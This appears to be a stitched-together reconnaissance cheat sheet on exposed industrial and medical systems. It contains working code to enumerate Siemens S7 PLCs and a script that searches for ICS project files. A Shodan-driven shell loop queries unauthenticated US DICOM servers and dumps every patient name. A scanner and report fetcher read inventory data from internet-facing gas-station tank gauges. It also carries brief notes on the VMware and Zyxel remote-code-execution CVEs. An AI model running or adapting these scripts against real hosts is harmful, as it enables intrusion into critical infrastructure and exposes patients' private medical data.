Enumerates Siemens S7 PLC devices and collects their device information. This script is based on PLCScan, developed by Positive Research and Scadastrangelove (https://code.google.com/p/plcscan/), and is meant to provide the same functionality as PLCScan inside Nmap. Some of the information that PLCScan collects was not ported over; that information can still be parsed out of the SZL reply packets the PLC returns.
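As an added example (not code from this page, from PLCScan or from Nmap's s7-info), the Python below builds the same three packets those scanners send (COTP connect to TSAP 0x0102, S7 setup communication, and SZL read requests) and parses the SZL 0x0011 (module identification) and 0x001C (component identification) replies by walking the S7comm header lengths instead of relying on fixed byte offsets. The field layout follows the S7comm userdata format as documented by Wireshark's dissector; the index-name tables are taken from the same source. The two sample replies at the bottom are constructed for offline use, not captured from a PLC.

```python
import socket
import struct

S7_PORT = 102  # ISO-TSAP: S7comm rides on TPKT/COTP over this port

# Fixed packets as sent by PLCScan / s7-info:
# COTP Connection Request, source TSAP 0x0100, destination TSAP 0x0102 (rack 0, slot 2)
COTP_CR = bytes.fromhex("0300001611e00000000100c0010ac1020100c2020102")
# S7 Setup Communication job: one parallel job per direction, PDU size 480
S7_SETUP = bytes.fromhex("0300001902f08032010000000000080000f0000001000101e0")
COTP_DT = bytes([0x02, 0xF0, 0x80])  # COTP data TPDU with "last data unit" set

# Index names per Wireshark's s7comm dissector
SZL_0011_INDEX = {0x0001: "module", 0x0006: "basic hardware", 0x0007: "basic firmware"}
SZL_001C_INDEX = {1: "system name", 2: "module name", 3: "plant identification",
                  4: "copyright", 5: "serial number", 7: "module type name",
                  8: "memory card serial", 9: "manufacturer/profile",
                  10: "OEM id", 11: "location"}


def tpkt(payload: bytes) -> bytes:
    """Prepend the RFC 1006 TPKT header (version 3, reserved, total length)."""
    return struct.pack(">BBH", 0x03, 0x00, 4 + len(payload)) + payload


def build_szl_request(szl_id: int, index: int = 0, pdu_ref: int = 0) -> bytes:
    """S7comm userdata PDU: function group 4 (CPU functions), subfunction 1 = read SZL."""
    param = bytes([0x00, 0x01, 0x12, 0x04, 0x11, 0x44, 0x01, 0x00])
    # data: return code 0xFF, transport size 0x09 (octet string), length 4, SZL-ID, index
    data = struct.pack(">BBHHH", 0xFF, 0x09, 4, szl_id, index)
    header = struct.pack(">BBHHHH", 0x32, 0x07, 0, pdu_ref, len(param), len(data))
    return tpkt(COTP_DT + header + param + data)


def build_szl_response(szl_id: int, records: list, index: int = 0) -> bytes:
    """Mirror of the reply layout; used here only to construct the offline samples."""
    body = struct.pack(">HHHH", szl_id, index, len(records[0]), len(records)) + b"".join(records)
    data = struct.pack(">BBH", 0xFF, 0x09, len(body)) + body
    param = bytes([0x00, 0x01, 0x12, 0x08, 0x12, 0x84, 0x01, 0x01, 0, 0, 0, 0])  # error code 0
    header = struct.pack(">BBHHHH", 0x32, 0x07, 0, 0, len(param), len(data))
    return tpkt(COTP_DT + header + param + data)


def parse_szl_response(pkt: bytes):
    """Return (szl_id, [raw record bytes]) from an SZL read reply, checking every layer."""
    if len(pkt) < 17 or pkt[0] != 0x03 or pkt[7] != 0x32:
        raise ValueError("not an S7comm PDU")
    if pkt[8] != 0x07:  # ROSCTR 7 = userdata; SZL replies always use it
        raise ValueError(f"unexpected ROSCTR 0x{pkt[8]:02x}")
    param_len, data_len = struct.unpack(">HH", pkt[13:17])
    param = pkt[17:17 + param_len]
    data = pkt[17 + param_len:17 + param_len + data_len]
    if param_len < 12 or len(param) != param_len or len(data) != data_len:
        raise ValueError("truncated PDU")
    err = struct.unpack(">H", param[10:12])[0]  # last two parameter bytes: error code
    if err:
        raise ValueError(f"CPU returned error 0x{err:04x}")
    if data[0] != 0xFF:  # data return code, 0xFF = success
        raise ValueError(f"data return code 0x{data[0]:02x}")
    szl_id, _index, rec_len, rec_count = struct.unpack(">HHHH", data[4:12])
    payload = data[12:12 + rec_len * rec_count]
    if len(payload) != rec_len * rec_count:
        raise ValueError("fewer records than announced")
    return szl_id, [payload[i * rec_len:(i + 1) * rec_len] for i in range(rec_count)]


def decode_szl_0011(records) -> dict:
    """SZL 0x0011 record: index, 20-char order number (MlfB), module type, two version words."""
    out = {}
    for rec in records:
        idx, mlfb, bgtyp, ausbg, ausbe = struct.unpack(">H20sHHH", rec[:28])
        out[SZL_0011_INDEX.get(idx, f"index 0x{idx:04x}")] = {
            "order_number": mlfb.rstrip(b"\x00 ").decode("ascii", "replace"),
            "module_type": bgtyp, "version": (ausbg, ausbe)}
    return out


def decode_szl_001c(records) -> dict:
    """SZL 0x001C record: index followed by 32 NUL-padded ASCII characters."""
    out = {}
    for rec in records:
        idx = struct.unpack(">H", rec[:2])[0]
        text = rec[2:34].split(b"\x00", 1)[0].decode("ascii", "replace").strip()
        out[SZL_001C_INDEX.get(idx, f"index 0x{idx:04x}")] = text
    return out


def recv_tpkt(sock) -> bytes:
    """Read exactly one TPKT-framed message, handling short reads."""
    buf = b""
    while len(buf) < 4 or len(buf) < struct.unpack(">H", buf[2:4])[0]:
        chunk = sock.recv(4096)
        if not chunk:
            raise ValueError("connection closed")
        buf += chunk
    return buf


def query_s7(host: str, timeout: float = 3.0) -> dict:
    """The exchange PLCScan performs: COTP connect, setup communication, SZL 0x0011 and 0x001C."""
    with socket.create_connection((host, S7_PORT), timeout=timeout) as s:
        s.sendall(COTP_CR)
        if recv_tpkt(s)[5] != 0xD0:  # expect a COTP Connection Confirm
            raise ValueError("COTP connect refused: wrong TSAP or not an S7 CPU")
        s.sendall(S7_SETUP)
        recv_tpkt(s)
        info = {}
        for szl_id, decode in ((0x0011, decode_szl_0011), (0x001C, decode_szl_001c)):
            s.sendall(build_szl_request(szl_id))
            info.update(decode(parse_szl_response(recv_tpkt(s))[1]))
        return info


# Constructed sample replies (illustrative values, not a capture from a real PLC)
SAMPLE_0011 = build_szl_response(0x0011, [
    struct.pack(">H20sHHH", 0x0001, b"6ES7 315-2EH14-0AB0 ", 0xC000, 0x0003, 0x0001),
    struct.pack(">H20sHHH", 0x0007, b"6ES7 315-2EH14-0AB0 ", 0xC000, 0x0003, 0x0003)])
SAMPLE_001C = build_szl_response(0x001C, [
    struct.pack(">H32s", 1, b"PUMP-STATION-1"),
    struct.pack(">H32s", 5, b"S C-C2UR28922012")])
```

`query_s7("192.0.2.10")` runs the live exchange against a PLC; the samples let the parsers be exercised without one. Because the parser derives the record table from the announced record length and count, it also handles CPUs that return more or fewer 0x001C records than an S7-300 does, which is where fixed-offset parsing silently misattributes fields.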
VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability (CVE-2022-22954) caused by server-side template injection. An attacker with network access to the web interface can inject a template expression that is evaluated on the server, which may result in remote code execution.
http.favicon.hash:-1250474341
Exposed DICOM Servers
Count patient names in US exposed DICOM medical servers with no authentication
```sh
# pull the Shodan result set, extract the IPs, then query each server for every patient
shodan download search "tag:medical country:us"
shodan parse --fields ip_str search.json.gz > usa_dicom_ip
while read -r ip; do
    echo "///// Now connecting to $ip ////"
    # -P = patient-root model; the QueryRetrieveLevel key is required for a patient-root C-FIND
    findscu -v -to 1 -P -k QueryRetrieveLevel=PATIENT -k PatientName="*" "$ip" 104 >> us_dicom_patient_names
    wc -l us_dicom_patient_names
done < usa_dicom_ip
```
Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.
Python script to search for common ICS file extensions
```python
# Author: selmux
import os

ics_path = r'/path/to/dir/'  # change path

# file extensions used by common ICS/SCADA engineering, configuration and project tools
ics_ext = (
    '.rtu', '.rdb', '.ctz', '.exp', '.hprb', '.selaprj', '.xml', '.bkp', '.ssnet', '.ncz',
    '.prj', '.rcd', '.SYS_BASCOM.COM', '.pcmp', '.pcmi', '.pcmt', '.spj', '.plz', '.spj.prev',
    '.adb', '.opt', '.out', '.prp', '.scl', '.icd', '.ied', '.cid', '.scd', '.ssd',
    '.ap12', '.ap13', '.ap14', '.ap15', '.ap16', '.ap17',
    '.zap12', '.zap13', '.zap14', '.zap15', '.zap16', '.zap17',
    '.conf', '.gz', '.zip', '.urs', '.tcw', '.hmb', '.m6b', '.sim', '.syl', '.cfg', '.pt2',
    '.l5x', '.txt', '.pl', '.paf', '.ini', '.cin', '.xrf', '.v', '.trc', '.s5d', '.s7p',
    '.mwp', '.s7f', '.arj', '.ekb', '.license', '.lic', '.vstax', '.cv4', '.dtq', '.pc5',
    '.eas', '.l5k', '.apa', '.gsd', '.gsg', '.gse', '.gsf', '.gsi', '.gsp', '.gss',
)

# walk the tree and print every file whose name ends with one of the extensions
for root, dirs, files in os.walk(ics_path):
    for file in files:
        if file.endswith(ics_ext):
            print(os.path.join(root, file))
```
Automated Tank Gauge (ATG) Remote Configuration Disclosure:
In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 gas station Automated Tank Gauges (ATGs) which were publicly accessible. Besides monitoring for leakage, these systems are also instrumental in gauging fluid levels, tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are utilized by nearly every fueling station in the United States and tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators will commonly configure the ATG serial interface to an internet-facing TCP port (generally set to TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.
```python
#!/usr/bin/env python3
import socket
import time

# one host per line in /tmp/ATG_SCAN.txt; confirmed ATGs are appended to /tmp/ATG_DEVICES.txt
with open("/tmp/ATG_SCAN.txt", 'r') as atg_file:
    for line in atg_file.read().splitlines():
        host = line.strip()
        if not host:
            continue
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as atg_socket:
                atg_socket.settimeout(3)  # without a timeout a filtered port stalls the whole scan
                port = 10001
                search_str = 'IN-TANK INVENTORY'
                # ^A (SOH) followed by function code I20100 = Get In-Tank Inventory Report
                msg = ('\x01' + 'I20100' + '\n').encode('ascii')
                atg_socket.connect((host, port))
                atg_socket.send(msg)
                time.sleep(.25)
                response = atg_socket.recv(1024).decode('ascii', 'replace')
                if search_str in response:
                    with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
                        file2.write(host + "\t ->\tATG Device\n")
        except OSError:
            pass  # refused, timed out or unreachable: not an exposed ATG
```
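The scan above only checks for the report banner. As an added example (not code from the page or from Rapid7's disclosure), the Python below requests the same I20100 report and parses it into one row per tank, so an exposure can be triaged by station, product and fill level. The sample report is constructed in the tabular layout the scan looks for, not captured from a real device; the assumption that the device terminates its reply with ETX (0x03) is used only as the read stop condition.

```python
import re
import socket

ATG_PORT = 10001
INVENTORY_CMD = "\x01I20100\n"  # SOH + function code 20100 (In-Tank Inventory Report)

# Constructed sample in the TLS-350 report layout (illustrative values only)
SAMPLE_REPORT = """\x01I20100
JAN 23, 2015 10:41 AM

EXAMPLE STATION


IN-TANK INVENTORY

TANK PRODUCT             VOLUME TC VOLUME   ULLAGE   HEIGHT    WATER     TEMP
  1  REGULAR               5542       5552     4498    41.83     0.00    63.35
  2  SUPER UNLEADED        3225       3226     5313    29.74     0.00    63.52
  3  DIESEL                7810       7798     2190    51.20     0.35    61.98
"""

# tank number, product name (may contain spaces), three integer and three decimal columns
ROW = re.compile(r"^\s*(\d+)\s+(.+?)\s+(\d+)\s+(\d+)\s+(\d+)\s+([\d.]+)\s+([\d.]+)\s+([\d.]+)\s*$")


def parse_inventory(report: str) -> dict:
    """Turn an I20100 reply into {'timestamp', 'station', 'tanks': [...]}."""
    lines = report.replace("\x01", "").splitlines()
    if not lines or not lines[0].strip().startswith("I20100"):
        raise ValueError("not an I20100 report")
    if "IN-TANK INVENTORY" not in report:
        raise ValueError("reply lacks the inventory section")
    header = [l.strip() for l in lines[1:] if l.strip()]
    timestamp = header[0]
    station = header[1] if header[1] != "IN-TANK INVENTORY" else ""
    tanks = []
    for line in lines:
        m = ROW.match(line)
        if not m:
            continue
        tank, product, vol, tc_vol, ullage, height, water, temp = m.groups()
        vol, ullage = int(vol), int(ullage)
        tanks.append({
            "tank": int(tank), "product": product, "volume": vol,
            "tc_volume": int(tc_vol), "ullage": ullage, "height": float(height),
            "water": float(water), "temp": float(temp),
            # volume plus ullage is the tank capacity, so this is the fill percentage
            "fill_pct": 100.0 * vol / (vol + ullage) if vol + ullage else 0.0,
        })
    return {"timestamp": timestamp, "station": station, "tanks": tanks}


def fetch_report(host: str, timeout: float = 5.0) -> str:
    """Send the inventory command and read until the ETX terminator (assumed) or timeout."""
    with socket.create_connection((host, ATG_PORT), timeout=timeout) as s:
        s.sendall(INVENTORY_CMD.encode("ascii"))
        buf = b""
        while b"\x03" not in buf:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    return buf.decode("ascii", "replace")
```

`parse_inventory(fetch_report("192.0.2.20"))` gives the per-tank rows for a live device; a non-zero `water` value or a `fill_pct` near 100 is exactly the operational data an unauthenticated reader should never be able to see, which is the point of the disclosure.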
SCADA system that uses Moxa brand products to establish connectivity and communication with industrial devices that are being monitored and controlled in a critical infrastructure or industrial process.